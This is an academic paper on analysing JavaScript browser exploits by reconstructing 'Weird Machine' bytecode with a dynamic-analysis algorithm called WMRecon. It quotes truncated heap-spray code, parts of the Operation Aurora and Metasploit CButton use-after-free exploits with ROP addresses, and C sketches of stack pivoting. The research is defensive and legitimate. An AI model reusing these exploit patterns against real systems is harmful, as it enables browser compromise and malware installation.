Log In Sign Up

Casting exploit analysis as a Weird Machine reconstruction problem

Exploits constitute malware in the form of application inputs. They take advantage of security vulnerabilities inside programs in order to yield execution control to attackers. The root cause of successful exploitation lies in emergent functionality introduced when programs are compiled and loaded in memory for execution, called `Weird Machines' (WMs). Essentially WMs are unexpected virtual machines that execute attackers' bytecode, complicating malware analysis whenever the bytecode set is unknown. We take the direction that WM bytecode is best understood at the level of the process memory layout attained by exploit execution. Each step building towards this memory layout comprises an exploit primitive, an exploit's basic building block. This work presents a WM reconstruction algorithm that works by identifying pre-defined exploit primitive-related behaviour during the dynamic analysis of target binaries, associating it with the responsible exploit segment - the WM bytecode. In this manner any analyst familiar with exploit programming will immediately recognise the reconstructed WM bytecode's semantics. This work is a first attempt at studying the feasibility of this method and focuses on web browsers when targeted by JavaScript exploits.


page 1

page 2

page 3

page 4


Detecting Exploit Primitives Automatically for Heap Vulnerabilities on Binary Programs

Automated Exploit Generation (AEG) is a well-known difficult task, espec...

Evading Malware Analysis Using Reverse Execution

Malware is a security threat, and various means are adapted to detect an...

Automatic Heap Layout Manipulation for Exploitation

Heap layout manipulation is integral to exploiting heap-based memory cor...

Drndalo: Lightweight Control Flow Obfuscation Through Minimal Processor/Compiler Co-Design

Binary analysis is traditionally used in the realm of malware detection....


The security of computer systems fundamentally relies on memory isolatio...

Non-Volatile Kernel Root kit Detection and Prevention in Cloud Computing

The field of web has turned into a basic part in everyday life. Security...

Detile: Fine-Grained Information Leak Detection in Script Engines

Memory disclosure attacks play an important role in the exploitation of ...

I Introduction

Exploits are a peculiar kind of malware, where rather than constituting a properly packaged executable binary or script/macro, they take the form of application inputs. Exploits take advantage of security flaws along with intended and unintended functionality inside applications in order to subvert their control flow. The shifting of application execution control to the attacker renders exploits and ideal entry point for intrusions. A typical scenario is that of drive-by-downloads [7] where application inputs in the form of malicious HTML that embed malicious client-side scripts, target memory corruption errors, e.g. buffer overflows or dangling pointers, inside web-browser/script-engine/browser-plugin code. The aim is to subvert the browser’s execution and make it download ‘conventional malware’, such as a backdoor or a command-and-control bot in order to complete a stealthy intrusion. While a multitude of vulnerability types abound, memory errors are quite distinguished due to their ability to yield the target’s computational power to the attacker all along with its security privileges, and are the focus of this work. Moreover we focus specifically on JavaScript exploits [6] targeting web browsers for the time being, although the longer term goal is to encompass all exploit forms.

The mainstream view on exploits is that: security vulnerabilities are their sole cause for success; exploits are as ad-hoc as much as the process of vulnerability introduction is; and that vulnerability elimination is the only way to secure application code-bases. Yet, this view misses the crucial emergent behaviour introduced when programs are compiled and loaded in memory for execution, and is what makes exploit programming possible. The term Weird Machine (WM) has been coined to refer to the instance when this emergent functionality is leveraged by attackers, and which presents a more complete/less ad-hoc view of the actual situation [3]. Think of this WM as some virtual machine that takes programs written in the bytecode that it understands for execution as input, and outputs the programs’ results (section II). The main point here is that the WM bytecode is not some documented VM instruction set, rather it is unknown.

In the field of malware analysis, WMs complicate the process of inferring malicious behaviour from JavaScript exploits since the script statements have to be analysed in terms of bytecode intended for the, yet unknown, WM as targeted by the exploit writer. As an example let’s compare Listings 1 and 2. The former is a snippet taken from the disassembly of a conventional binary malware. In this case the malware’s behaviour can be directly inferred from the semantics of the physical machine instructions and system API calls: lines 1-8 set up the arguments for the InternetOpenUrlA call on line 9, and depending on it’s return value execution is forked on lines 10-12 to possibly download cc.htm from on line 14.

3push 0x4070f4 ; Mozilla/5.0 (Windows NT 6.3; …”
4call dword [ds:imp_InternetOpenA]
5mov  dword [ss:ebp+var_C], eax
7push 0x4070c4 ;
8mov  eax, dword [ss:ebp+var_C]
9push eax
10call dword [ds:imp_InternetOpenUrlA]
11mov  dword [ss:ebp+var_10], eax
12cmp  dword [ss:ebp+var_10], 0x0
13jne  0x40109d
15call dword [ds:imp_InternetReadFile]
Listing 1: Binary malware dissassembly

The latter HTML-embedded JavaScript sample is more intricate. At face value lines 6-7 create a hidden HTML layer, lines 8-9 create a very long string which is then used as a property value to the multitude of HTML buttons added to this invisible layer on lines 10-15. In web design terms this snippet is pretty much useless. Yet this is none other than a WM bytecode sequence intended to setup attacker-controlled physical machine instructions inside the browser’s memory and eventually executed by subsequent statements that exploit the presence of a memory error inside the browser’s code-base. Thus, reconstructing the WM bytecode is the essential first step for exploit analysis.

5<div id=”blah”></div>
6<script language = javascript’>
7var div_container = document.getElementbyId(”blah”); = display:none”;
9var data = unescape(”%9090%…snip…%CCCC…”);
10while (data.length < 0x80000) data += data;
11for (var i=0; i<0x250; i++)
13        var obj = document.createElement(”button”);
14        obj.title = data.substring(0,0x40000-0x58);
15        div_container.appendChild(obj);
16} snip
Listing 2: JavaScript exploit malware

In-line with the above example, we postulate that from an exploit analysis point-of-view, the WM bytecode is best understood at the level of the process memory layout that exploits are programmed to attain, eventually enabling them to program the WM. Each step taken to build towards this layout comprises an exploit primitive: the basic building blocks of exploit programming. This way any analyst familiar with exploit programming will immediately recognize the bytecode’s semantics. This work is a first attempt at studying the feasibility of this approach, and as far as we know we are the first to cast exploit analysis as a WM reconstruction problem. The end result is a WM reconstruction algorithm that works by identifying pre-defined exploit primitive-related runtime behaviour during dynamic binary analysis and subsequently associating it with the responsible exploit snippet as fed as input to the target browser (section III). The implicated script statements constitute the WM’s bytecode syntax, the machine’s opcodes so to speak, while the exploit primitives assigned to them through appropriate labels provide their semantics. Experimentation with 4 popular exploit primitives as used by 3 script exploit case studies (section IV) demonstrate that detecting WM bytecode syntax and their semantics using exploit primitives is possible by defining the primitives as program memory-level state transitions. In turn the case studies show that having a WM reconstruction algorithm at the heart of an exploit analysis tool helps the analyst to move beyond the script’s superficial semantics and into the program memory level, which is what matters when understanding exploits. Finally, experimentation outcome provides the basis for a research direction for completing the work on a finalized exploit analysis tool usable in a wider array of exploit forms (sections V and VI).

Ii Background and related work

Fig. 1: Weird Machines: Emergent program functionality that produce unexpected virtual machines.

The Weird Machines (WM) targeted by attackers are none other than emergent program functionality as generated by compilers, linkers and program loaders in the process of executable image creation and loading. The resulting executable inside program memory comprises machine code and data that has been for long treated as obscure/uninteresting material by computer scientists, even though this is where attackers thrive [3]. Access to this emergent functionality in fact requires substantial knowledge of what goes on at the program memory level, along with the presence of memory errors for activating its full malicious potential. Fig. 1 depicts the scenario of programming a WM emerging from web browsers. The intended functionality here constitutes the parsing of HTML documents into some intermediate representation, e.g. Document Object Model (DOM) tree, which is then fed to a rendering algorithm for on-screen visualization. Embedded JavaScript snippets, or any supported scripting language for that matter, are instead passed on to a script engine for interpretation/just-in-time compilation. Ultimately, a number of statements constitute calling back into the browser (and it’s extensions) to dynamically update the rendered page. The code-base concerned is typically natively coded in C, or any of its derivatives, and which is a process highly prone to the introduction of memory errors, e.g. see [11], resulting in particularly dangerous WM bytecode that can fully subvert the executable’s control flow.

This is what happens in the case of drive-by-downloads, where using scripts similar to the one shown in Listing 2 as input WM programs made up of WM bytecode, these are processed by the emerging WM to compute ’s output, e.g. backdoor installation. So far the WM concept has been used to explain the computational hardness of the input sanitization problem as a means to eliminate security-related errors inside parser code-bases whenever processing untrusted application inputs. Its proponents suggest a formal language/parser-generation approach to secure coding [13]. Subsequently, investigation of the WM concept has been taken beyond software programs and into the hardware domain [1].

Scripts exploits have been of particular interest in recent years since they improve upon earlier file/network packet exploit techniques in order to break modern exploit deferences [16]. In turn these exploits have become much more daunting to understand. Listing 3 depicts the layout of a typical file exploit, that usually contains some string intended to both corrupt a function pointer in memory as well as the compiled malicious code to be executed. In contrast, script exploits involve multiple steps that create a specific program memory layout before successful exploitation can take place, typically aiming to divert execution to some earlier created string whose content doubles as valid machine code. Nowadays, exploit sophistication has increased to the level where existing executable content inside the browser’s memory can be searched for and re-composed in a way to create new computations on-the-fly. This way a myriad of exploit mitigations can be defeated. As a result, manually inferring the exploit sequence proves to be a painstaking process that requires intimate knowledge of complex script engines, document parsers, as well the interaction between the two, e.g. see [9]. Rather, an exploit analysis tool that labels simple/compound scripts statements as WM bytecode, and whose semantics are grounded in exploit primitive behaviour, would only require knowledge of exploit programming in general.

| Header field 1 | Header field 2 | 90 90 90 
(very long string)… CC CC CC CC CC 
Listing 3: File exploit fragment

Exploit analysis is a specific instance of malware analysis in general, which is an incident response task that studies malware samples acquired during digital investigation. Its aim is to infer malware objectives from compiled code to produce actionable information in the form of intrusion detection rule-sets and dis-infection routines. Exploit analysis specifically is concerned with improving upon existing exploit mitigations as well as to inform more secure code-bases in general. Research-wise, exploration has been mainly concerned with the complete exposure of malicious behaviour inside malware sandboxes, and therefore providing effective automation. The main challenge here is posed by hidden/trigger-based behaviour that eludes sandboxes [10]. This is typically handled as a state-space exploration problem solvable using symbolic execution of binaries [15]. Taint analysis is a complementary technique used to identify the data objects of interest so as to solely apply expensive symbolic execution upon those traces that process these objects, while concretely executing the remaining ones [4]. Once the sought after behaviour is finally exposed it is paramount that this is recognized as such [12].

The work closest to ours, JScalpel, builds upon this approach with the purpose of identifying just the execution of the injected code, distinguishing it from browser/engine activity during dynamic binary analysis [8]. This method however disregards explaining the overall exploit strategy and highlighting, for example, how existing mitigations are being bypassed or which statements actively program the emerging WM. Yet, it does acknowledge the value of aiding the analyst in fully understanding exploits by weeding out statements that do not contribute to exploitation. By focusing on WM reconstruction, we propose that exploit scripts can be labelled in a way to support the analyst throughout the entire exploitation sequence.

Iii Weird Machine reconstruction

The WM reconstruction algorithm revolves around the notion of an exploit primitive which was first coined in [14]. Informally, and within the specific context of script exploits, it refers to a simple or compound script statement that provides access to a program memory-level (native) operation that would otherwise not be directly available at script-level. Here, we are interested in characterizing WM bytecode in terms of exploit primitives, with the WM bytecode space encompassing all possible exploit primitives, while the primitives’ behaviour provide bytecode with their semantics. Formally:

Definition 1.

An exploit primitive’s behaviour, as identified through its primitive label is defined as: the program memory state transition function ; where and are abstractions over the full program memory state defined as a set of derived values and ; while is the set of candidate Weird Machine bytecode, where each candidate primitive label could be associated with a simple or compound statement inside script exploit .

Definition 2.

A Weird Machine with respect to the execution of web browser on input exploit , denoted by , is defined as: the function ; where is the set of labels, one for each defined exploit primitive behaviour in . Then for some implies that constitutes valid bytecode for , whose semantics is defined by the sequence of ’s corresponding to the string of labels . Note: is not injective, meaning that the same exploit primitive label string could be associated with different bytecodes. This is a stark reminder that we are not dealing with conventional purposely-designed virtual machines, but rather with unintended ‘weird’ ones.

Therefore WM reconstruction is about identifying the WM bytecode’s syntax and semantics so to speak, and comprises: i) Choosing the exploit primitives of interest. ii) Expressing their behaviour in the form of program memory state transitions . iii) Script preparation in terms of identifying the script statements that comprise candidate WM bytecode and marking them accordingly. iv) Detecting transitions conforming to some during the dynamic binary analysis of the browser/engine as executed upon the exploit script under analysis. v) Associating any detected with its corresponding using label , which is now confirmed as being an exploit primitive/WM bytecode. is added to the WM bytecode set, while provides its semantics. This procedure is formalized by algorithm 1 - WMRecon. It executes until exploit termination or time-out (line 1). resumeExecutionUntilNextP() (line 2) executes the exploit up until before the next . During a fresh analysis it is line 11 that executes next, calling deriveState() in order to compute the abstract program state associated with the prior execution of . In case of simple statements the second state is computed as the resulting state when gets executed by executeComplete() (lines 16-17). Finally, lines 18-20 use transitionsIdentify() in order to detect a possible sequence of state transitions conforming to some ’s in , updating accordingly. In case a is associated with a compound statement, the derived is pushed onto a stack (lines 12-15), which is then only used when all of its corresponding statements have completed execution (lines 3-10). In this manner, each individual script statement can be associated with multiple candidate WM bytecodes, i.e. on its own as well as part of statement blocks.

Input: Web Browser , Exploit sample , as defined over , the set of labels corresponding to
Output: The reconstructed Weird Machine
1 while  !(terminates() or timesOut() )  do
2        ResumeExecutionUntilBeforeNextP();
3        if closesCompound(p)  then
4               deriveState();
5               popStack();
6               if  ( transitionsIdentify(, , ))  then
7                      ;
8                      next;
10               end if
12        end if
13        deriveState();
14        if isCompound()  then
15              pushStack();
16               next;
17        end if
18       executeComplete();
19        deriveState();
20        if  ( transitionsIdentify(, , ))  then
21               ;
23        end if
25 end while
26return ;
Algorithm 1 WMRecon - Weird Machine reconstruction

Once incorporated as part of an exploit analysis tool the envisaged process, depicted in Fig. 2, proceeds as follows: i) The de-obfuscated script (e.g. using JSBeautifier111 is prepared with markers representing the candidate primitives using the setMarker(‘Candidate primitive’). resetMarker() is used to end a marker associated with compound statements. This step can be carried out manually or can be tool assisted. ii) markers are then associated with WM bytecode labels, e.g. //Loop::AllocPrimitive, whenever found to produce exploit primitive behaviour. In this case, the candidate primitive marker Loop has been associated with the AllocPrimitive exploit primitive, referring to its memory allocation behaviour for example. The subsequent Info: line further qualifies the observed runtime behaviour. The labelled script exploit presents the partially reconstructed WM, with the compound for-loop statement block identified as valid WM bytecode, whose semantics is to allocate 5 chunks of 1MB memory buffers. Completing the WM could require further iterations with adjusted markers and further analysis iterations.

Fig. 2: An example exploit analysis process when using a tool that implements WMRecon

Iv Evaluation

The idea of doing exploit analysis by reconstructing the WMs targeted by the exploit writers is now evaluated for its feasibility. Specifically this is carried out in terms of expressing exploit primitive behaviour as program memory state transition functions (section IV-A) and their effectiveness when utilized by a WRecon-based tool (section IV-B) in correctly labelling exploit samples (section IV-C), and thus accurately reconstructing the WMs concerned.

Iv-a Exploit primitives

4 exploit primitives are chosen based on the notion that they should provide the script level with access to native operations. Each primitive is first informally described, then a C-code (native-level) snippet form of description is used as an aid in building towards a formal description. Finally the formal definition is provided, that takes the form of a constraint on the prior () and post () transition states that needs to be satisfied by the candidate primitives in to be associated with .

1) Memory allocation primitive

Allocates a chunk of memory on the process heap. At the C code-level, this primitive is described as a function call to the standard C library malloc() function. Of course this is just a tool for intuition, as in most cases it is not expected that at the script level it will be possible to utilize the allocated portion of memory in any way the programmer desires, as when programming natively. Furthermore, memory allocation could be carried out in various ways even at the native level e.g. directly through a system call or else by calling custom memory managers. Consequently its behaviour can be expressed over the abstract program state , as: , such that .

2) Memory freeing primitive

Frees a previously allocated chunk of memory on the process heap, as expressed at the C code-level through a call to free(). It’s behaviour is expressed over the same abstract program state as the previous primitive. In fact its behaviour is exactly the opposite and is defined as: , such that .

3) Execute crafted code primitive

Sets the program counter to an address containing attacker-controlled executable content and executes it. As such, the C code-level behaviour this time requires a description that is a bit more involved, making use of a function pointer initialized to an address containing machine instructions that dynamically extends the original code-base. The description is as follows:

void execCrafted {
   void (*fptr)();
   void target_addr = <predicted/disclosed>;
        //Contains attacker-controlled code
   fptr = target_addr;

It is understood that target_addr already contains attacker-controlled code from the execution of prior primitives. The same argument applies in case target_addr requires disclosing when it cannot be predicted a-priori. Finally, this primitive requires the presence of a memory error before it can be made available at the script level, e.g. a buffer overflow or a dangling pointer, and thus relates to the WM bytecode of the most dangerous kind. The corresponding behaviour is expressed over the abstract program state as: , such that . refers to the program counter register, while ‘expected codebase’ refers to the known memory regions containing the browser’s code e.g. .text executable image sections or heap memory reserved for just-in-time (JIT) script engines.

4) Call stack replacement primitive

Sets the stack pointer to an attacker-controlled memory location containing a fabricated call stack, corrupting the flow execution on return from the innermost function call thereafter. As such, the C code-level behaviour is very similar to the previous primitive but for two differences. Firstly, it is the presence of a fabricated call stack which is being assumed, rather than attacker-controlled executable content. Secondly, it is the stack pointer register this time being manipulated, hence the inline assembly performing a stack pivot. This primitive also presupposes a memory error, with its description being:

void callStackReplace {
   void target_addr = <predicted/disclosed>;
        //Contains the fabricated call stack
   asm volatile(”mov %rsp, %0” : : r (target_addr));

The corresponding behaviour is expressed over the abstract program state as: , such that . refers to the stack pointer register, while ‘expected call stack’ refers to the memory regions containing known call stacks for application threads.

Iv-B Prototype implementation

A prototype of a WMRecon-based tool was developed for the Windows OS/Internet Explorer environment, which is a popular target for drive-by-downloads. DynamoRIO222, a dynamic binary analysis framework, was used for tracing the web browser’s instructions during state transition monitoring, as well as to introspect CPU register values and memory content during program state derivation (carried out per basic instruction block of the script engine thread). Its umbra extension also offers a convenient way to walk Window’s process VAD trees (umbra_iterate_app_memory()), while at the same time filtering out non-application (i.e. analysis-related) VAD nodes. As for heap memory manager information, specifically concerning freed/available memory regions, these are obtained through KD333’s !vm extension command.

Implementation of the setMarker() and resetMaker() marker functions (as per Fig. 2) are provided inside a marker.js script file and which requires inclusion within exploit files during the script preparation phase. Their implementation makes use of the javascript:alert() function which in the case of Internet Explorer results in a call to MessageBoxIndirectW(). During program instruction tracing, any call to this function with arguments matching an expected marker is skipped, with the relevant prior () and post () transition states being computed accordingly. The known code and call stack regions required by exploit primitives 3 and 4 are computed when execution reaches the browser’s WinMain() entry point. Overall, the accuracy of program state derivation implemented by the current prototype is known to possibly be impacted by multi-threading, as well as lack of knowledge of custom memory managers and their garbage collectors (typical of script engines).

Iv-C Case studies

We now present 3 exploit case studies, each including a number of the previously defined exploit primitives and ordered according to sophistication. In each case, the pre-analysis markers and post-analysis labels are shown in a superimposed manner in the corresponding script listings. Technical analysis of the 3 exploits are publicly available and thus the accuracy of the labelling could be verified against them. For each case study, the latest vulnerable OS/browser version configurations were used.

1) Standard heap spray

The first case study is taken from a heap spraying tutorial [6], a technique commonly used to inject multiple instances of malicious compiled code inside the target vulnerable application. The environment is Win XP SP3/IE 6.00.2800.1106. Listing 4 shows snippets from the exploit sample. In this study a number of memalloc and memfree primitives were expected and which were duly labelled on lines 9-11, 23-26, and 32-35. Specifically, the while loop on line 12 is identified as a sequence of predominantly memory allocations with some interleaved frees, with memory[i]=block+shellcode; and memory[i]=’’; clearly representing memory allocation and freeing WM bytecodes respectively.

2<script src=”marker.js”></script>
4var shellcode = unescape(’%u\4141%u\4141’);
5var bigblock = unescape(’%u\9090%u\9090’);
6var headersize = 20;
7var slack = headersize + shellcode.length;
11        memfreeSNIP
12//[Info: SNIP…31KB+63KB+63KB+63KBSNIP…]
13while (bigblock.length < slack)
14        bigblock += bigblock;
15var fillblock = bigblock.substring(0,slack);
16var block = bigblock.substring\\
17        (0,bigblock.length - slack);
18while (block.length + slack < 0x40000)
19        block = block + block + fillblock;
21var memory = new Array();
22for (i = 0; i < 500; i++) {
23        setMarker(’Shellcode’+i);
24        //Shellcode0::memalloc
25        //[Info:511KB]
26        //Shellcode1::memalloc
27        //[Info:511KB] SNIP
28        memory[i] = block + shellcode;
31for (i = 0; i < 500; i++) {
32        setMarker(’Free’+i);
33        //Free0::memalloc
34        //[Info:511KB]
35        //Free1::memfree
36        //[Info:511KB] SNIP
37        memory[i] = ”;
Listing 4: Standard heap spray

2) Operation Aurora exploit

The second case study is taken from a technical blog that analyses the exploit that was used in the popular Operation Aurora cyberattack [2]. The experimentation setup is identical to the one used for the previous exploit. In this case a heap spay is followed by a use-after-free (UAF) exploit (CVE 2010-0249) and is representative of typical scenarios where virtual function pointers get corrupted as a consequence of non-coordination between multiple pointers being used to point to the same object in memory. When one of the pointers is used to free the memory object with missing/incorrect reference counting, the other pointers are left referencing a memory region that can get reused at any time, and thus have its virtual function table pointer ‘overwritten’ and subsequent behaviour left undefined. Listing 5 shows snippets from the exploit sample. Lines 18-19 identify the entire function FOverwrite() as valid WM bytecode that executes crafted code. In particular the information label //[Info:0x0c0d0c0d on line 19 gives away what line 26 is about. Not shown in the snippet is a sequence of memory allocation and freeing primitives inside the function HeapSpray() that crafts the code in a similar fashion to the previous case study. Yet, on lines 12-13 the FRemove marker remains unlabelled even though a memfree label is expected. What is happening here is that this memory region is being freed to a custom allocator but not to the underlying system heap memory manager, impacting on a known limitation of the prototype.

2<script src=”marker.js”></script>
6function HeapSpray() {
10function FRemove(onLoadEvent) {
15Element1 = document.createEventObject(onLoadEvent);
16document.getElementById(”SpanID”).innerHTML = ””;
21window.setInterval(FOverwrite, 50);
26function FOverwrite()  {
27buffer = ”\u0c0d\u0c0dSNIP…”;
28for (i = 0; i < Array1.length; i++)
29        Array1[i].data = buffer;
33<span id=”SpanID”>
34        <img src=”/abcd.gif onload=”FRemove(event)” />
Listing 5: Operation Aurora exploit

3) CButton use-after-free (UAF)

The third case study obtained from the Metasploit444The Metasploit Framework - ie_cbutton_uaf exploit penetration testing framework was chosen for its use of the Return-Oriented Programming (ROP) technique. ROP is about recomposing existing executable content inside the target browser and thus is able to bypass Data Execution Prevention (DEP) mitigation that renders stack/heap segments non-executable, and any exploits expecting them to be so are thus rendered inert. In the presence of a library loaded at a deterministic memory address base (i.e. non-Address Space Layout Randomization (ASLR) enabled), a UAF exploit (CVE 2012-4792) is used to direct execution to an instruction that pivots the stack to an attacker-controlled location, enabling the execution of an instruction sequence that effectively switches off DEP. The exploit then resumes in a similar fashion to the previous case study. The sample is shown in Listing 6 and is executed on a Win XP SP3/IE 8.0.6001.18702 environment. The entire function mstime_malloc() as called from line 54 constitutes WM bytecode whose semantics corresponds to a sequence of callStackReplace and execCrafted primitives. The addresses present in the labels (0x046ae04c and 0x046ae1ad) are respectively the contents of the stack pointer and program counter registers. These are addresses of memory locations allocated during script execution, and which trigger the detection of exploit primitives 4 and 3. Further iterations would be required to zoom into a finer level of analysis granularity in order to identify those statements specifically causing each type of exploit primitive behaviour. In the meantime the create_btns, free_btns and gc markers on lines 19, 27 and 32 respectively remain unlabelled due to the same custom allocator issue already encountered in the previous case study. On the other hand the prepare marker on line 36 is properly labelled. The allocation sizes concerned indicate that, in the case of Internet Explorer, larger allocations are likely to get detected since they affect the underlying system heap manager, or else avoid involving the custom allocator altogether.

2<!doctype html>
3<HTML XMLNS:t =”urn:schemas-microsoft-com:time”>
6<?IMPORT namespace=”t implementation=”#default#time2”>
10function mstime_malloc(oArg) {
15function helloWorld() {
16e_form = document.getElementById(”formelm”);
17e_div = document.getElementById(”divelm”);
21for(i =0; i < 20; i++) {
22  document.createElement(’button’);
29e_div.innerHTML = ””;
38//[Info: 6KB+6KB+12KB+25KB]
39p = unescape(”%u5770%u466b”);
40for (i=0; i < 3; i++) {
41  p += unescape(”%u5770%u466b”);
43p += unescape(”%ub860SNIP…”);
45fo = unescape(”%ud801%u77c4”);
46for (i=0; i < 55; i++) {
47  if (i == 54) { fo += unescape(”%u5ed5%u77c1”); }
48  else         { fo += unescape(”%ud801%u77c4”); }
51fo += p;
53  setMarker(’mstime’);
55        +callStackReplace+…SNIP…+execCrafted
56//[Info: 118KB+118KBSNIP…\\
57        +0x046ae04c+…SNIP…+0x046ae1ad]
58mstime_malloc({shellcode:fo, heapBlockSize:0x58,\\
59                                 objId:”myanim”});
64<body onload=”eval(helloWorld())”>
65        <t:ANIMATECOLOR id=”myanim”/>
66        <div id=”divelm”></div>
67        <form id=”formelm”>
68        </form>
Listing 6: CButton UAF exploit

V Discussion and Research direction

Results obtained from the case studies demonstrate promise for the feasibility of approaching exploit analysis through WM reconstruction. In particular the 4 primitives, along with the process followed for defining them, show how exploit primitives can be defined in the manner required by the WMRecon algorithm. Despite the case studies being based on relatively less recent exploits and targets, mandated by the elevated sophistication of the more recent ones, they nonetheless attain their intent of demonstrating the end-to-end applicability of the idea being proposed and therefore augur favourably towards further exploration in this direction. Definitely, one important outcome is the crucial requirement that tools implementing WMRecon should be able to accurately detect and monitor custom application-level memory managers. Substantial effort has already been devoted towards this endeavour in previous work with significant success [5], and therefore a solid starting point is already in place.

Only once this aspect has been dealt with can research proceed to cover more sophisticated/recent exploits as case studies. In particular, we are after exploits that leverage multiple features and vulnerabilities from their targets, possibly combining different parsing modules and script engines of the same web browser within individual steps of the same exploit. One specific example555 leverages an ActionScript engine’s deterministic memory layout combined with a JavaScript-accessible browser vulnerability to be able to bypass ASLR-randomized heaps by leaking memory content. A separate memory error in the ActionScript engine is then used to subvert execution, switching off DEP using ROP in the process. Reconstructing WMs from exploits having a similar level of sophistication entails defining further exploit primitives, e.g. attacker-controlled memory reads, as well as being able to separate the program memory state transitions of different application threads during dynamic binary analysis.

In the longer term the followed up idea should also cater for: assisting analysts during the marker placement process; script de-obfuscation specifically targeted for aiding exploit analysis; non-web browser script exploit case studies; as well as kernel exploit case studies. With respect to the latter research avenue it is interesting to note that kernel exploits are similar to script exploits, in the sense that, while script exploits utilize primitives to access native-level operations from the script-level, likewise kernel exploits access kernel-level operations from user-level.

Vi Conclusions

In this paper we tackled the problem of the ever-increasing difficulty of analysing script exploits due to their increased sophistication. The approach taken was to cast the exploit analysis problem as a Weird Machine (WM) reconstruction problem, that aims to identify those script statements being used as exploit primitives in order to take advantage of emergent functionality inside target applications constituting a WM, and of which they are valid bytecode. This novel idea proposes that exploit analysts can benefit from the automated identification of individual exploit steps while only being required to be knowledgeable of exploit programming in general. Therefore, they can do away with having to learn the in-depth details of a multitude of web browser and script engine implementations.

As explained at length in this paper, analysis of script exploits has nothing to do with the superficial semantics of script statements, rather it has all to do with the program memory-level (native) operations that they aim to attain in their quest to program the WM. In-line with this concept, we presented WMRecon, a WM reconstruction algorithm that takes a dynamic binary analysis approach in order to detect behaviour caused by exploit primitives and associating it with the responsible script statements. These constitute valid WM bytecode while the associated exploit primitive behaviours provide the corresponding semantics. The reconstructed WM is none other than this identified bytecode set. Experimentation with exploit samples of moderate sophistication demonstrates the feasibility of this approach. At the same time results also point towards the crucial requirement of enhancing the current prototype with the capability to detect and monitor customer memory managers, before it can handle exploits with an elevated level of sophistication. In particular we are aiming for exploits that combine multiple script languages and eventually to also consider adding kernel exploits within scope.


  • [1] J. Bangert, S. Bratus, R. Shapiro, and S. W. Smith (2013) The page-fault weird machine: lessons in instruction-less computation.. In WOOT, Cited by: §II.
  • [2] S. Bradshaw () Heap spray exploit tutorial: Internet Explorer Use After Free Aurora vulnerability.[Accessed:03/04/2017] , pp. . Cited by: §IV-C.
  • [3] S. Bratus, M. E. Locasto, M. L. Patterson, L. Sassaman, and A. Shubina (2011)

    Exploit programming: from buffer overflows to weird machines and theory of computation

    USENIX; login 36 (6). Cited by: §I, §II.
  • [4] S. K. Cha, T. Avgerinos, A. Rebert, and D. Brumley (2012) Unleashing Mayhem on binary code. In Security and Privacy (SP), 2012 IEEE Symposium on, pp. 380–394. Cited by: §II.
  • [5] X. Chen, A. Slowinska, and H. Bos (2013) MemBrush: a practical tool to detect custom memory allocators in C binaries. In Reverse Engineering (WCRE), 2013 20th Working Conference on, pp. 477–478. Cited by: §V.
  • [6] Corelan () Heap spraying demystified. [Accessed: 03/04/2017]. Cited by: §I, §IV-C.
  • [7] M. Cova, C. Kruegel, and G. Vigna (2010) Detection and analysis of drive-by-download attacks and malicious javascript code. In Proceedings of the 19th international conference on World Wide Web, pp. 281–290. Cited by: §I.
  • [8] X. Hu, A. Prakash, J. Wang, R. Zhou, Y. Cheng, and H. Yin (2016) Semantics-preserving dissection of javascript exploits via dynamic js-binary analysis. In International Symposium on Research in Attacks, Intrusions, and Defenses, pp. 254–276. Cited by: §II.
  • [9] T. Micro () A look into Adobe Flash Player CVE-2016-1019 zero-day attack. [Accessed: 03/04/2017] , pp. . Cited by: §II.
  • [10] A. Moser, C. Kruegel, and E. Kirda (2007) Exploring multiple execution paths for malware analysis. In Security and Privacy, 2007. SP’07. IEEE Symposium on, pp. 231–245. Cited by: §II.
  • [11] () MS IE security vulnerabilities.\_id-26/product\_id-9900/Microsoft-Internet-Explorer.html [Accessed: 03/05/2017] , pp. . Cited by: §II.
  • [12] Y. Qu and K. Hughes (2013) Detecting metamorphic malware by using behavior-based aggregated signature. In Internet Security (WorldCIS), 2013 World Congress on, pp. 13–18. Cited by: §II.
  • [13] L. Sassaman, M. L. Patterson, and S. Bratus (2012) A patch for postel’s robustness principle. IEEE Security & Privacy 10 (2), pp. 87–91. Cited by: §II.
  • [14] F. Serna () The info leak era on software exploitation.\_US\_12\_Serna\_Leak\_Era\_Slides.pdf [Accessed: 03/04/2017] , pp. . Cited by: §III.
  • [15] D. Song, D. Brumley, H. Yin, J. Caballero, I. Jager, M. G. Kang, Z. Liang, J. Newsome, P. Poosankam, and P. Saxena (2008) BitBlaze: a new approach to computer security via binary analysis. In International Conference on Information Systems Security, pp. 1–25. Cited by: §II.
  • [16] () Windows 10 mitigation improvements. [Accessed: 03/04/2017] , pp. . Cited by: §II.